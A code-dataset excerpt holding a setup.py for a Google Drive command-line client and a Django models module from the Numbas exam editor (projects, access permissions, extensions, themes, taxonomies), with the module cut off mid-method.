ext | sha | content
---|---|---
py | 1a37bde1cef301c86424d495dc0865826f9789ab |
# -*- coding: UTF-8 -*-
import os
from setuptools import setup
from typing import List
def _get_relative_path(file_path: str) -> str:
return os.path.join(os.path.dirname(__file__), file_path)
def load_requirements() -> List[str]:
# Load requirements
requirements = [] # type: List[str]
with open(_get_relative_path("requirements.txt"), "r") as req_file:
lines = [line.rstrip("\n") for line in req_file]
lines = list(filter(lambda line: line != "" and line[0] != "#", lines))
for line in lines:
hash_pos = line.find("#")
if hash_pos != -1:
requirements.append(line[:hash_pos].strip())
else:
requirements.append(line)
return requirements
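# Illustrative example (not from the original file): given a requirements.txt containing
#     requests>=2.0   # HTTP client
#     # a full-line comment
#     google-api-python-client
# load_requirements() drops the blank and full-line-comment entries, strips the
# trailing "# HTTP client" comment, and returns
# ['requests>=2.0', 'google-api-python-client']. The package names here are
# hypothetical, chosen only to show the parsing behaviour.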
def main():
drive_ns = {}
with open(_get_relative_path("drive/__version__.py")) as f:
exec(f.read(), drive_ns)
setup(
name='drive',
version=drive_ns["__version__"],
author='Baptiste Fontaine',
author_email='[email protected]',
packages=['drive', 'drive.cli'],
url='https://github.com/NoName115/drive',
license='MIT License',
description='Google Drive client',
long_description=open('README.md', encoding='utf-8').read(),
long_description_content_type='text/markdown',
install_requires=load_requirements(),
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
entry_points={
"console_scripts": [
"gd-upload=drive.cli.upload:main",
"gd-download=drive.cli.download:main",
]
}
)
if __name__ == "__main__":
main()
|
py | 1a37beacc600417af3c8c484eb8242958b934420 |
import uuid
import os
import re
from copy import deepcopy
import shutil
from zipfile import ZipFile
import json
from datetime import datetime
from itertools import groupby
import codecs
from pathlib import Path
import urllib.parse
try:
# For Python >= 2.7
from collections import OrderedDict
except ImportError:
# For Python < 2.7 (after installing the ordereddict backport)
from ordereddict import OrderedDict
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.staticfiles import finders
from django.core.exceptions import ValidationError
from django.core.files.storage import default_storage
from django.urls import reverse
from django.db import models, transaction
from django.db.models import signals, Max, Min
from django.db.models.functions import Lower
from django.dispatch import receiver
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.db.models import Q
from django.forms import model_to_dict
from django.utils import timezone
from django.utils.deconstruct import deconstructible
from django.template.loader import get_template
from django.core.mail import send_mail
from .slugify import slugify
import reversion
import reversion.models
from notifications.signals import notify
from notifications.models import Notification
import taggit.models
from taggit.managers import TaggableManager
import numbasobject
from .notify_watching import notify_watching
from .jsonfield import JSONField
PUBLIC_ACCESS_CHOICES = (('hidden', 'Hidden'), ('view', 'Public can view'), ('edit', 'Public can edit'))
USER_ACCESS_CHOICES = (('view', 'Can view'), ('edit', 'Can edit'))
@deconstructible
class ControlledObject(object):
superuser_sees_everything = True
@property
def owner(self):
raise NotImplementedError
def has_access(self, user, accept_levels):
raise NotImplementedError
def can_be_viewed_by(self, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return True
accept_levels = ('view', 'edit')
try:
if self.published and self.public_access in accept_levels:
return True
except AttributeError:
pass
return (self.superuser_sees_everything and user.is_superuser) or (self.owner == user) or (self.has_access(user, accept_levels))
def can_be_copied_by(self, user):
if not self.can_be_viewed_by(user):
return False
if user.is_superuser or self.owner == user or self.has_access(user, ('edit',)):
return True
elif not self.licence:
return False
else:
return self.licence.can_reuse and self.licence.can_modify
def can_be_deleted_by(self, user):
return user == self.owner
def can_be_edited_by(self, user):
try:
if self.public_access == 'edit':
return True
except AttributeError:
pass
return (user.is_superuser) or (self.owner == user) or self.has_access(user, ('edit',))
def __eq__(self, other):
return True
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if user.is_superuser and cls.superuser_sees_everything:
return Q()
elif user.is_anonymous:
return Q(published=True, public_access__in=view_perms)
else:
return (Q(accesses__user=user, accesses__access__in=view_perms)
| Q(published=True, public_access__in=view_perms)
| Q(author=user)
| Q(project__projectaccess__user=user)
| Q(project__owner=user)
)
class TimelineMixin(object):
"""
A model which produces a timeline item when it is created.
Models inheriting from this should implement either
* self.object, or
* self.timeline_object() and self.can_be_deleted_by(user)
as well as a GenericRelation `timelineitems` to TimelineItem
"""
def can_be_deleted_by(self, user):
try:
if self.object.author == user:
return True
except AttributeError:
pass
return user == self.user
def can_be_viewed_by(self, user):
raise NotImplementedError
def timeline_object(self):
try:
return self.object
except AttributeError:
ct = ContentType.objects.get(pk=self.object_content_type.pk)
return ct.get_object_for_this_type(pk=self.object_id)
@property
def timelineitem(self):
return self.timelineitems.get()
LOCALE_CHOICES = [(y, x) for x, y in settings.GLOBAL_SETTINGS['NUMBAS_LOCALES']]
def combine_access(*args):
order = ['view','edit']
return sorted(args,key=order.index)[-1]
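# Illustrative examples (not from the original file):
#   combine_access('view', 'edit')  -> 'edit'
#   combine_access('view', 'view')  -> 'view'
# i.e. the most permissive of the given access levels wins.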
def reassign_content(from_user,to_user):
with transaction.atomic():
for p in from_user.own_projects.all():
p.owner = to_user
p.save()
for pa in from_user.project_memberships.all():
try:
pa2 = ProjectAccess.objects.get(user=to_user,project=pa.project)
access = combine_access(pa.access,pa2.access)
if access!=pa2.access:
pa2.access = access
pa2.save()
except ProjectAccess.DoesNotExist:
pa.user = to_user
pa.save()
for e in from_user.own_extensions.all():
e.author = to_user
e.save()
for t in from_user.own_themes.all():
t.author = to_user
t.save()
for cpt in from_user.own_custom_part_types.all():
cpt.author = to_user
cpt.save()
for r in from_user.resources.all():
r.owner = to_user
r.save()
for a in from_user.item_accesses.all():
try:
a2 = Access.objects.get(user=to_user,item=a.item)
access = combine_access(a.access,a2.access)
if access!=a2.access:
a2.access = access
a2.save()
except Access.DoesNotExist:
a.user = to_user
a.save()
for ei in from_user.own_items.all():
ei.author = to_user
ei.save()
class Project(models.Model, ControlledObject):
name = models.CharField(max_length=200)
owner = models.ForeignKey(User, related_name='own_projects', on_delete=models.CASCADE)
permissions = models.ManyToManyField(User, through='ProjectAccess')
timeline = GenericRelation('TimelineItem', related_query_name='projects', content_type_field='timeline_content_type', object_id_field='timeline_id')
public_view = models.BooleanField(default=False)
watching_non_members = models.ManyToManyField(User, related_name='watched_projects')
unwatching_members = models.ManyToManyField(User, related_name='unwatched_projects')
icon = 'briefcase'
description = models.TextField(blank=True)
default_locale = models.CharField(max_length=10, editable=True, default='en-GB')
default_licence = models.ForeignKey('Licence', null=True, blank=True, on_delete=models.SET_NULL)
custom_part_types = models.ManyToManyField('CustomPartType', related_name='projects')
class Meta:
ordering = ['name']
def can_be_edited_by(self, user):
return (user.is_superuser) or (self.owner == user) or self.has_access(user, ('edit',))
def can_be_viewed_by(self, user):
return self.public_view or super(Project, self).can_be_viewed_by(user)
def get_absolute_url(self):
return reverse('project_index', args=(self.pk,))
def has_access(self, user, levels):
if user.is_anonymous:
return False
if user==self.owner:
return True
return ProjectAccess.objects.filter(project=self, user=user, access__in=levels).exists()
def members(self):
return [self.owner]+self.non_owner_members()
def non_owner_members(self):
return list(User.objects.filter(project_memberships__project=self).exclude(pk=self.owner.pk))
def all_timeline(self):
items = self.timeline.all() | TimelineItem.objects.filter(editoritems__project=self)
items = items.order_by('-date')
return items
@property
def watching_users(self):
q = (User.objects.filter(pk=self.owner.pk) | User.objects.filter(project_memberships__project=self) | self.watching_non_members.all()).distinct()
return q.exclude(pk__in=self.unwatching_members.all())
def __str__(self):
return self.name
def num_published_questions(self):
return self.items.questions().filter(published=True).count()
def num_published_exams(self):
return self.items.exams().filter(published=True).count()
def folder_hierarchy(self):
folders = self.folders.all()
tree = []
folder_dict = {f.pk: {'folder': f, 'subfolders': []} for f in folders}
for f in folders:
if f.parent and f.parent.pk in folder_dict:
folder_dict[f.parent.pk]['subfolders'].append(folder_dict[f.pk])
else:
tree.append(folder_dict[f.pk])
return tree
def get_folder_breadcrumbs(self,path):
breadcrumbs = []
if len(path):
parent = None
for name in path.split('/'):
try:
folder = self.folders.get(name=urllib.parse.unquote(name),parent=parent)
except Folder.MultipleObjectsReturned:
folders = self.folders.filter(name=urllib.parse.unquote(name),parent=parent)
folder = folders[0]
with transaction.atomic():
for ofolder in folders[1:]:
ofolder.merge_into(folder)
breadcrumbs.append(folder)
parent = folder
return breadcrumbs
def get_folder(self,path):
breadcrumbs = self.get_folder_breadcrumbs(path)
if len(breadcrumbs):
return breadcrumbs[-1]
else:
return None
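# Illustrative example (not from the original file): for the path
# 'Algebra/Linear%20equations', get_folder_breadcrumbs returns the Folder named
# 'Algebra' followed by its child 'Linear equations' (each path component is
# URL-unquoted before lookup), and get_folder returns the final folder. The
# folder names here are hypothetical. Note that duplicate sibling folders with
# the same name are merged as a side effect of the lookup.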
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if user.is_superuser and cls.superuser_sees_everything:
return Q()
elif user.is_anonymous:
return Q(public_view=True)
else:
return (Q(projectaccess__user=user, projectaccess__access__in=view_perms)
| Q(public_view=True)
| Q(owner=user)
)
class ProjectAccess(models.Model, TimelineMixin):
project = models.ForeignKey(Project, on_delete=models.CASCADE, related_name='projectaccess')
user = models.ForeignKey(User, related_name='project_memberships', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='project_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_deleted_by(self, user):
return self.project.can_be_edited_by(user)
def can_be_viewed_by(self, user):
return self.project.can_be_viewed_by(user)
def timeline_object(self):
return self.project
timeline_noun = 'project'
def icon(self):
return 'eye-open'
class Meta:
unique_together = (("project", "user"),)
class ProjectInvitation(models.Model):
email = models.EmailField()
invited_by = models.ForeignKey(User, on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
project = models.ForeignKey(Project, related_name='invitations', on_delete=models.CASCADE)
applied = models.BooleanField(default=False)
def __str__(self):
return "Invitation for {} to join {}".format(self.email, self.project)
@receiver(signals.post_save, sender=ProjectInvitation)
def send_project_invitation(instance, created, **kwargs):
if created:
template = get_template('project/invitation_email.txt')
content = template.render({'invitation':instance, 'SITE_TITLE':settings.SITE_TITLE})
subject = 'Invitation to join project "{}", on {}'.format(instance.project.name, settings.SITE_TITLE)
send_mail(subject, content, from_email=settings.DEFAULT_FROM_EMAIL, recipient_list=(instance.email,))
@receiver(signals.post_save, sender=User)
def apply_project_invitations(instance, created, **kwargs):
if created:
invitations = ProjectInvitation.objects.filter(email__iexact=instance.email)
for invitation in invitations:
project = invitation.project
if not project.has_access(instance,(invitation.access,)):
try:
access = ProjectAccess.objects.get(project=project,user=instance)
access.access = invitation.access
access.save()
except ProjectAccess.DoesNotExist:
ProjectAccess.objects.create(project=invitation.project, user=instance, access=invitation.access)
invitation.applied = True
invitation.save()
class EditorTag(taggit.models.TagBase):
official = models.BooleanField(default=False)
class Meta:
verbose_name = 'tag'
ordering = ['name']
def used_count(self):
return self.tagged_items.count()
# Check that the .exam file for an object is valid and defines, at the very least, a name.
def validate_content(content):
try:
obj = numbasobject.NumbasObject(content)
if not 'name' in obj.data:
raise ValidationError('No "name" property in content.')
except Exception as err:
raise ValidationError(err)
class EditablePackageMixin(object):
"""
A package whose contents can be edited by users with the right access privileges.
Extensions and themes are editable packages.
"""
package_noun = None
def filenames(self):
top = Path(self.extracted_path)
for d,dirs,files in os.walk(str(top)):
rd = Path(d).relative_to(top)
if str(rd)=='.' or not re.match(r'^\.',str(rd)):
for f in sorted(files,key=str):
if not re.match(r'^\.',f):
yield str(rd / f)
def write_file(self,filename,content):
root = os.path.abspath(self.extracted_path)
path = os.path.abspath(os.path.join(root,filename))
if not path.startswith(root+os.sep):
raise Exception("You may not write a file outside the {package_noun}'s directory".format(package_noun=self.package_noun))
dpath = Path(path).parent
dpath.mkdir(parents=True,exist_ok=True)
with open(path,'w',encoding='utf-8') as f:
f.write(content)
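# Note: the os.path.abspath comparison above rejects path-traversal filenames
# such as '../outside.txt', which would otherwise let a write escape the
# package's extracted directory.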
@property
def relative_extracted_path(self):
raise NotImplementedError
@property
def extracted_path(self):
return os.path.join(os.getcwd(), settings.MEDIA_ROOT, self.relative_extracted_path)
def url_for(self, filename):
return settings.MEDIA_URL+self.relative_extracted_path+'/'+filename
def ensure_extracted_path_exists(self):
if os.path.exists(self.extracted_path):
shutil.rmtree(self.extracted_path)
os.makedirs(self.extracted_path)
@property
def readme_filename(self):
names = ['README.md','README.html','README']
for name in names:
if self.has_file(name):
return name
return names[0]
def has_file(self, filename):
return os.path.exists(os.path.join(self.extracted_path,filename))
class Extension(models.Model, ControlledObject, EditablePackageMixin):
name = models.CharField(max_length=200, help_text='A human-readable name for the extension')
location = models.CharField(default='', max_length=200, help_text='A unique identifier for this extension', verbose_name='Short name', blank=True, unique=True)
url = models.CharField(max_length=300, blank=True, verbose_name='Documentation URL', help_text='Address of a page about the extension. Leave blank to use the README file.')
public = models.BooleanField(default=False, help_text='Can this extension be seen by everyone?')
slug = models.SlugField(max_length=200, editable=False, unique=False, default='an-extension')
author = models.ForeignKey(User, related_name='own_extensions', blank=True, null=True, on_delete=models.CASCADE)
last_modified = models.DateTimeField(auto_now=True)
zipfile_folder = 'user-extensions'
zipfile = models.FileField(upload_to=zipfile_folder+'/zips', blank=True, null=True, max_length=255, verbose_name='Extension package', help_text='A .zip package containing the extension\'s files')
editable = models.BooleanField(default=True, help_text='Is this extension stored within the editor\'s media folder?')
runs_headless = models.BooleanField(default=True, help_text='Can this extension run outside a browser?')
superuser_sees_everything = False
package_noun = 'extension'
timeline_noun = 'extension'
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def can_be_edited_by(self, user):
return (user.is_superuser) or (self.author == user) or self.has_access(user, ('edit',))
def can_be_viewed_by(self, user):
return self.public or super().can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return user == self.author
def has_access(self, user, levels):
if user.is_anonymous:
return False
if user==self.author:
return True
return ExtensionAccess.objects.filter(extension=self, user=user, access__in=levels).exists()
@property
def owner(self):
return self.author
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if cls.superuser_sees_everything and user.is_superuser:
return Q()
elif user.is_anonymous:
return Q(public=True)
else:
return (Q(access__user=user, access__access__in=view_perms)
| Q(public=True)
| Q(author=user)
)
def as_json(self):
d = {
'name': self.name,
'url': reverse('extension_documentation',args=(self.pk,)),
'pk': self.pk,
'location': self.location,
'author': self.author.pk if self.author is not None else None,
'edit_url': reverse('extension_edit', args=(self.pk,)),
}
path = self.script_path
if path is not None:
d['hasScript'] = True
d['scriptURL'] = path
return d
@property
def main_filename(self):
return self.location+'.js'
@property
def script_path(self):
if self.editable:
filename = self.main_filename
local_path = os.path.join(self.extracted_path, filename)
if os.path.exists(local_path):
return settings.MEDIA_URL+self.zipfile_folder+'/extracted/'+str(self.pk)+'/'+self.location+'/'+filename
else:
path = 'js/numbas/extensions/%s/%s.js' % (self.location, self.location)
if finders.find(path):
return settings.STATIC_URL+path
return None
@property
def relative_extracted_path(self):
if self.pk is None:
raise Exception("This object doesn't have an ID yet.")
return os.path.join(self.zipfile_folder, 'extracted', str(self.pk), self.location)
@property
def extracted_path(self):
if self.editable:
return super().extracted_path
else:
return os.path.join(settings.GLOBAL_SETTINGS['NUMBAS_PATH'], 'extensions', self.location)
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(Extension, self).save(*args, **kwargs)
def extract_zip(self):
if not self.zipfile:
return
self.ensure_extracted_path_exists()
_, extension = os.path.splitext(self.zipfile.name)
if extension.lower() == '.zip':
z = ZipFile(self.zipfile.file, 'r')
z.extractall(self.extracted_path)
elif extension.lower() == '.js':
file = open(os.path.join(self.extracted_path, self.location+'.js'), 'wb')
file.write(self.zipfile.file.read())
file.close()
def get_absolute_url(self):
return reverse('extension_documentation',args=(self.pk,))
def icon(self):
return 'wrench'
@receiver(signals.pre_save)
def extract_editable_package_zip_pre(sender,instance,**kwargs):
if not isinstance(instance,EditablePackageMixin):
return
changed_zipfile = False
if instance.zipfile:
try:
old_extension = instance.__class__.objects.get(pk=instance.pk)
changed_zipfile = old_extension.zipfile != instance.zipfile
except instance.__class__.DoesNotExist:
changed_zipfile = True
instance.__changed_zipfile = changed_zipfile
@receiver(signals.post_save)
def extract_editable_package_zip_post(sender,instance,**kwargs):
if not isinstance(instance,EditablePackageMixin):
return
if getattr(instance,'__changed_zipfile',False):
instance.extract_zip()
@receiver(signals.pre_delete, sender=Extension)
def delete_extracted_extension(sender,instance,**kwargs):
if not instance.editable:
return
p = Path(instance.extracted_path).parent
if p.exists():
shutil.rmtree(str(p))
class ExtensionAccess(models.Model, TimelineMixin):
extension = models.ForeignKey('Extension', related_name='access', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='extension_accesses', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='extension_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_viewed_by(self, user):
return self.extension.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return self.extension.can_be_deleted_by(user)
def timeline_object(self):
return self.extension
class Theme(models.Model, ControlledObject, EditablePackageMixin):
name = models.CharField(max_length=200)
public = models.BooleanField(default=False, help_text='Can this theme be seen by everyone?')
slug = models.SlugField(max_length=200, editable=False, unique=False)
author = models.ForeignKey(User, related_name='own_themes', on_delete=models.CASCADE)
last_modified = models.DateTimeField(auto_now=True)
zipfile_folder = 'user-themes'
zipfile = models.FileField(upload_to=zipfile_folder+'/zips', max_length=255, verbose_name='Theme package', help_text='A .zip package containing the theme\'s files')
package_noun = 'theme'
timeline_noun = 'theme'
editable = True
def __str__(self):
return self.name
def can_be_viewed_by(self, user):
return self.public or super().can_be_viewed_by(user)
def has_access(self, user, levels):
if user.is_anonymous:
return False
if user==self.author:
return True
return ThemeAccess.objects.filter(theme=self, user=user, access__in=levels).exists()
@property
def owner(self):
return self.author
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if cls.superuser_sees_everything and user.is_superuser:
return Q()
elif user.is_anonymous:
return Q(public=True)
else:
return (Q(access__user=user, access__access__in=view_perms)
| Q(public=True)
| Q(author=user)
)
@property
def relative_extracted_path(self):
return os.path.join(self.zipfile_folder, 'extracted', str(self.pk))
@property
def main_filename(self):
if self.has_file('inherit.txt'):
return 'inherit.txt'
else:
return self.readme_filename
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(Theme, self).save(*args, **kwargs)
def extract_zip(self):
if not self.zipfile:
return
self.ensure_extracted_path_exists()
z = ZipFile(self.zipfile.file, 'r')
z.extractall(self.extracted_path)
def get_absolute_url(self):
return reverse('theme_edit',args=(self.pk,))
def icon(self):
return 'sunglasses'
class ThemeAccess(models.Model, TimelineMixin):
theme = models.ForeignKey('Theme', related_name='access', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='theme_accesses', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='theme_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_viewed_by(self, user):
return self.theme.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return self.theme.can_be_deleted_by(user)
def timeline_object(self):
return self.theme
@receiver(signals.pre_delete, sender=Theme)
def reset_theme_on_delete(sender, instance, **kwargs):
default_theme = settings.GLOBAL_SETTINGS['NUMBAS_THEMES'][0][1]
for exam in instance.used_in_newexams.all():
exam.custom_theme = None
exam.theme = default_theme
exam.save()
CUSTOM_PART_TYPE_PUBLIC_CHOICES = [
('restricted', 'Only to permitted users'),
('always', 'Always available'),
('select', 'When selected'),
]
CUSTOM_PART_TYPE_INPUT_WIDGETS = [
('string', 'String'),
('number', 'Number'),
('jme', 'Mathematical expression'),
('matrix', 'Matrix'),
('radios', 'Radio buttons'),
('checkboxes', 'Choose several from a list'),
('dropdown', 'Drop-down box'),
]
class CustomPartType(models.Model, ControlledObject):
author = models.ForeignKey(User, related_name='own_custom_part_types', on_delete=models.CASCADE)
name = models.CharField(max_length=200, verbose_name='Name')
short_name = models.CharField(max_length=200, unique=True, verbose_name='Unique identifier for this part type')
description = models.TextField(default='', blank=True, verbose_name='What\'s this part type for?')
input_widget = models.CharField(max_length=200, choices = CUSTOM_PART_TYPE_INPUT_WIDGETS, verbose_name='Answer input method')
input_options = JSONField(blank=True, verbose_name='Options for the answer input method')
can_be_gap = models.BooleanField(default=True, verbose_name='Can this part be a gap?')
can_be_step = models.BooleanField(default=True, verbose_name='Can this part be a step?')
marking_script = models.TextField(default='', blank=True, verbose_name='Marking algorithm')
marking_notes = JSONField(blank=True,default='[]', verbose_name='Marking algorithm notes')
settings = JSONField(blank=True)
help_url = models.URLField(blank=True, verbose_name='URL of documentation')
public_availability = models.CharField(max_length=10, choices=CUSTOM_PART_TYPE_PUBLIC_CHOICES, verbose_name='Public availability', default='restricted')
ready_to_use = models.BooleanField(default=False, verbose_name='Ready to use?')
copy_of = models.ForeignKey('self', null=True, related_name='copies', on_delete=models.SET_NULL)
extensions = models.ManyToManyField(Extension, blank=True)
def copy(self, author, name):
new_type = CustomPartType.objects.get(pk=self.pk)
new_type.pk = None
new_type.id = None
new_type.author = author
new_type.public_availability = 'restricted'
new_type.name = name
new_type.set_short_name(slugify(name))
new_type.copy_of = self
new_type.save()
new_type.extensions.set(self.extensions.all())
return new_type
def __str__(self):
return self.name
@property
def filename(self):
return slugify(self.name)
def __repr__(self):
return '<CustomPartType: {}>'.format(self.short_name)
def get_absolute_url(self):
return reverse('custom_part_type_edit', args=(self.pk,))
@property
def owner(self):
return self.author
def set_short_name(self, slug):
built_in_part_types = ['jme','numberentry','patternmatch','matrix','gapfill','information','extension','1_n_2','m_n_2','m_n_x']
if slug in built_in_part_types:
slug = 'custom-'+slug
short_name = slug
i = 0
while CustomPartType.objects.exclude(pk=self.pk).filter(short_name=short_name).exists():
i += 1
short_name = '{}-{}'.format(slug,i)
self.short_name = short_name
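# Illustrative examples (not from the original file):
#   set_short_name('jme') stores 'custom-jme', since 'jme' is a built-in part
#   type name; if 'custom-jme' is already taken, the counter yields
#   'custom-jme-1', then 'custom-jme-2', and so on.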
def has_access(self, user, levels):
if 'view' in levels:
if self.published:
return True
if user.is_anonymous:
return False
if user==self.owner:
return True
return False
def can_be_copied_by(self, user):
return user.is_superuser or self.owner == user or self.published
@property
def published(self):
return self.public_availability != 'restricted'
def as_json(self):
return {
'source': {
'pk': self.pk,
'author': {
'name': self.author.get_full_name(),
'pk': self.author.pk,
},
'edit_page': reverse('custom_part_type_edit', args=(self.pk,)),
},
'name': self.name,
'short_name': self.short_name,
'description': self.description,
'help_url': self.help_url,
'input_widget': self.input_widget,
'input_options': self.input_options,
'can_be_gap': self.can_be_gap,
'can_be_step': self.can_be_step,
'marking_script': self.marking_script,
'marking_notes': self.marking_notes,
'settings': self.settings,
'public_availability': self.public_availability,
'published': self.published,
'extensions': [e.location for e in self.extensions.all()],
}
def as_source(self):
obj = self.as_json()
obj['source'] = {
'author': {
'name': self.author.get_full_name(),
}
}
return obj
class Resource(models.Model):
owner = models.ForeignKey(User, related_name='resources', on_delete=models.CASCADE)
date_created = models.DateTimeField(auto_now_add=True)
file = models.FileField(upload_to='question-resources/', max_length=255)
alt_text = models.TextField(blank=True)
def __str__(self):
return self.file.name
@property
def resource_url(self):
return 'resources/%s' % self.file.name
@property
def filetype(self):
name,ext = os.path.splitext(self.file.name)
return ext
def get_created_time(self):
return default_storage.get_created_time(self.file.name)
def is_image(self):
return self.filetype.lower() in ('.png','.jpg','.svg','.gif')
def delete(self, *args, **kwargs):
self.file.delete(save=False)
super(Resource, self).delete(*args, **kwargs)
def as_json(self):
return {
'url': self.resource_url,
'name': self.file.name,
'pk': self.pk,
'alt_text': self.alt_text,
}
class Licence(models.Model):
name = models.CharField(max_length=80, unique=True)
short_name = models.CharField(max_length=20, unique=True)
can_reuse = models.BooleanField(default=True)
can_modify = models.BooleanField(default=True)
can_sell = models.BooleanField(default=True)
url = models.URLField(blank=True)
full_text = models.TextField(blank=True)
def __str__(self):
return self.name
def as_json(self):
return {
'name': self.name,
'short_name': self.short_name,
'can_reuse': self.can_reuse,
'can_modify': self.can_modify,
'can_sell': self.can_sell,
'url': self.url,
'pk': self.pk,
}
STAMP_STATUS_CHOICES = (
('ok', 'Ready to use'),
('dontuse', 'Should not be used'),
('problem', 'Has some problems'),
('broken', 'Doesn\'t work'),
('pleasetest', 'Needs to be tested'),
)
class AbilityFramework(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
ABILITY_PRECISION = 10
class AbilityLevel(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
start = models.DecimalField(max_digits=ABILITY_PRECISION+1, decimal_places=ABILITY_PRECISION)
end = models.DecimalField(max_digits=ABILITY_PRECISION+1, decimal_places=ABILITY_PRECISION)
framework = models.ForeignKey(AbilityFramework, related_name='levels', on_delete=models.CASCADE)
class Meta:
ordering = ('framework', 'start',)
def __str__(self):
return self.name
class Subject(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
class Topic(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
subjects = models.ManyToManyField(Subject)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
class Taxonomy(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
json = JSONField(blank=True) # Building the JSON encoding of the taxonomy's nodes is slow and requires many database queries, so it's cached here and updated each time a node changes.
class Meta:
verbose_name_plural = 'taxonomies'
def __str__(self):
return self.name
def forest(self):
"""
The nodes in the taxonomy, returned as a list of trees associating each node to its children.
"""
key = lambda n:(len(n.code),n.code)
def make_tree(node):
return [(n,make_tree(n)) for n in sorted(node.children.all(), key=key)]
return [(n,make_tree(n)) for n in sorted(self.nodes.filter(parent=None),key=key)]
def create_json(self):
def tree_json(leaves):
return [{
'pk': node.pk,
'name': node.name,
'code': node.code,
'children': tree_json(kids)
} for node,kids in leaves]
self.json = tree_json(self.forest())
return self.json
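# Illustrative example (not from the original file) of the shape cached by
# create_json(), with hypothetical node values:
#   [{'pk': 1, 'name': 'Algebra', 'code': '1', 'children': [
#       {'pk': 2, 'name': 'Linear equations', 'code': '1.1', 'children': []}]}]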
class TaxonomyNode(models.Model):
name = models.CharField(max_length=200, blank=False, unique=False)
parent = models.ForeignKey('TaxonomyNode', on_delete = models.CASCADE, related_name='children', blank=True, null=True)
taxonomy = models.ForeignKey(Taxonomy, related_name='nodes', on_delete=models.CASCADE)
code = models.CharField(max_length=200, blank=False)
def __str__(self):
return self.name
@receiver(signals.post_save, sender=TaxonomyNode)
def update_taxonomy_json(instance, **kwargs):
t = instance.taxonomy
t.create_json()
t.save()
class AbilityLevelField(models.FloatField):
pass
class TaggedItem(taggit.models.GenericTaggedItemBase):
tag = models.ForeignKey(EditorTag, related_name='tagged_editoritems', on_delete=models.CASCADE)
class TaggedQuestion(taggit.models.GenericTaggedItemBase):
tag = models.ForeignKey(EditorTag, related_name='tagged_items', on_delete=models.CASCADE)
class Access(models.Model, TimelineMixin):
item = models.ForeignKey('EditorItem', related_name='accesses', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='item_accesses', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='item_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_viewed_by(self, user):
return self.item.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return self.item.can_be_deleted_by(user)
def timeline_object(self):
return self.item
def icon(self):
return 'eye-open'
NUMBAS_FILE_VERSION = 'exam_results_page_options'
@deconstructible
class NumbasObject(object):
def get_parsed_content(self):
if self.content:
self.parsed_content = numbasobject.NumbasObject(self.content)
self.name = self.parsed_content.data['name']
elif self.name:
self.parsed_content = numbasobject.NumbasObject(data={'name': self.name}, version=NUMBAS_FILE_VERSION)
self.metadata = self.parsed_content.data.get('metadata', self.metadata)
self.content = str(self.parsed_content)
return self.parsed_content
def set_name(self, name):
self.name = name
if self.content:
self.get_parsed_content()
self.parsed_content.data['name'] = name
self.content = str(self.parsed_content)
self.save()
def __eq__(self, other):
return self.content == other.content
class EditorItemManager(models.Manager):
def questions(self):
return self.exclude(question=None)
def exams(self):
return self.exclude(exam=None)
def published(self):
return self.filter(published=True)
class Contributor(models.Model):
item = models.ForeignKey('EditorItem', on_delete=models.CASCADE, related_name='contributors')
user = models.ForeignKey(User, related_name='item_contributions', on_delete=models.CASCADE, blank=True, null=True)
name = models.CharField(max_length=200,blank=True)
profile_url = models.URLField(blank=True)
def __str__(self):
name = self.user.get_full_name() if self.user else self.name
return '{} on "{}"'.format(name,self.item)
def as_json(self, request):
if self.user:
user = self.user
